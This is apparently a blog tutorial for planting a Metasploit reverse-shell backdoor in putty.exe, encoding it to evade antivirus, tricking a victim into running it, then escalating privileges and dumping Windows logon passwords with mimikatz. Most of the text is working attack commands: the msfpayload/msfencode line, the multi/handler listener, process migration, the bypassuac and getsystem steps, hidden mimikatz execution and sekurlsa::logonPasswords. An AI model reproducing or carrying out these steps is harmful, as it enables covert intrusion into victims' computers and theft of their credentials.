First of all we will create a payload(which we will later send to the  victim for execution) but do you think somebody is going to click on a simple file which does nothing even on being executed and still not getting suspicious? The answer is simple,NO.
So here we will bind the file with a legitimate executable, which in turn is going to reduce the suspicious factor drastically. In this tutorial I’m using a very simple program (putty.exe) which just pops up "You just got Pwned!"(i know this clearly tips off the victim, but anyway this is just for the sake of the tutorial, you can use any .exe of your choice).
The troubles don’t end here, any AV(Anti Virus) is going to catch a msf payload. This is where crypting comes into play, in this tutorial I am using x86/shikata_na_gai  encoder which although has been ranked as “excellent” in msfencode does not make the file FUD(Fully UnDetectable) but it does reduce the chances of getting caught depending on the AV which has been implemented on the victim machine. There are methods of making files FUD but then it will deviate us from our current aim.

So let’s get started.
Stuff you'll need
  • Kali Linux / Backtrack
  • Windows machine(target)
  • A little bit of linux and msf knowledge (although i have tried to explain every single thing)
  • Mimikatz (Download here)
$- cd ./Desktop$- unzip –d /root/Desktop/mimikatz

Here first we change our directory to desktop then extract mimikatz(the tool to dump windows passwords in clear text) to a directory in desktop.

Here first we change our directory to desktop then We make a folder called “hax”, then we copy “putty.exe” from the desktop to  the recently created directory, and then recheck using the “ls” command and then we again change directory to “hax”.
Then we fire the next command:

$- cp putty.exe /usr/share/metasploit-framework/data/templates/

This is because we are using “putty.exe” as a template in the next command, so it needs to be in place.

$- msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4443 R | msfencode -t exe -x putty.exe -k -o bdoor_putty.exe -e x86/shikata_ga_nai -c 3

Where “LHOST” is the IP address and “LPORT” is the port(I’m using 4443, you can use any) of the attacking machine.
Here we are creating a backdoor and we use R – for raw output, this allows us to ‘pipe’ the code into the encoder, the | is the ‘pipe’. Then we use “–t” to specify the type of output(exe in this case), “-x” to mention the template(putty.exe in this case), we use the “-k” switch to retain the original functionality of the program in which the backdoor is to be inserted, “-o” to specify the output name, “-e” to specify the encoder to be used and finally “-c” to specify the number of times the file will be encoded.

If we hadn’t copied “putty.exe” to /usr/share/metasploit-framework/data/templates/ then we would have encountered an error similar to the one given below:

[-] x86/shikata_ga_nai failed: No such file or directory - /usr/share/metasploit-framework/data/templates/putty.exe
[-] No encoders succeeded.

Then we make it executable using the chmod command.
$- chmod +x bdoor_putty.exe

Now we need to send the backdoored “putty.exe” to the victim and wait for him execute the executable.
Meanwhile let us prepare to receive the shell.
$- msfconsole
$- use exploit/multi/handler
$- set payload wndows/meterpreter/reverse_tcp
$- set LHOST=
$- set LPORT=4443

Then we use
$- show options
To make sure our settings are fine

Next we use
$- exploit

And upon execution of our backdoored “putty.exe” putty opens up just fine on the victim’s side.

But on our side the scene has changed a bit.

As you can see, we got a meterpreter session on the target machine(finally!).
But now a process “bdoor_putty.exe” has been started on the victim’s pc, which means we will lose our session as soon as the victim closes our backdoored program. Therefore we will migrate to a more stable process(explorer.exe in this case).

$- run migrate –n explorer.exe

Then let us create a folder called “mimi” where will upload all the contents mimikatz/Win32 (target machine is 32 bit).
$- mkdir c:\\mimi
$- upload /root/Desktop/mimikatz/Win32 c:\\mimi

Now lets fire up mimikatz.

$- execute –f c:\\mimi\\mimikatz.exe –H –i

Here “–H” switch was used to create the process hidden from view and “-i” was used to interact with the process after it is created.

Then we type the following command in mimikatz
$- privilege::debug

Although the tool is written in French we can see that it does not have “all privileges”, which means we need to get system (system not administrator) level privileges.
So now to attain system level priviledges we use /post/windows/escalate/bypassuac
$- run post/windows/escalate/bypassuac
Then as we can see that it made another meterpreter session with system privileges. So now we change to the recently created session and run "getsystem".

$- background
$- sessions -i 2
$- getsystem
Now we go into the same directory where we had uploaded mimikatz and run the executable.
$- cd c:\\mimi
$- execute –f cmd.exe –H –i
$- mimikatz.exe
And then type in the following command to check proper privileges.
$- privilege::debug

So now we see that everything is “OK”.
Now to get the password of logged in user we use the following command.
$- sekurlsa::logonPasswords

There are chances that a very big list might pop up, but you can easily distinguish the information of interest.
With this I end this tutorial, I hope it proved helpful for you. Please use the comment section wisely.

Post a Comment Blogger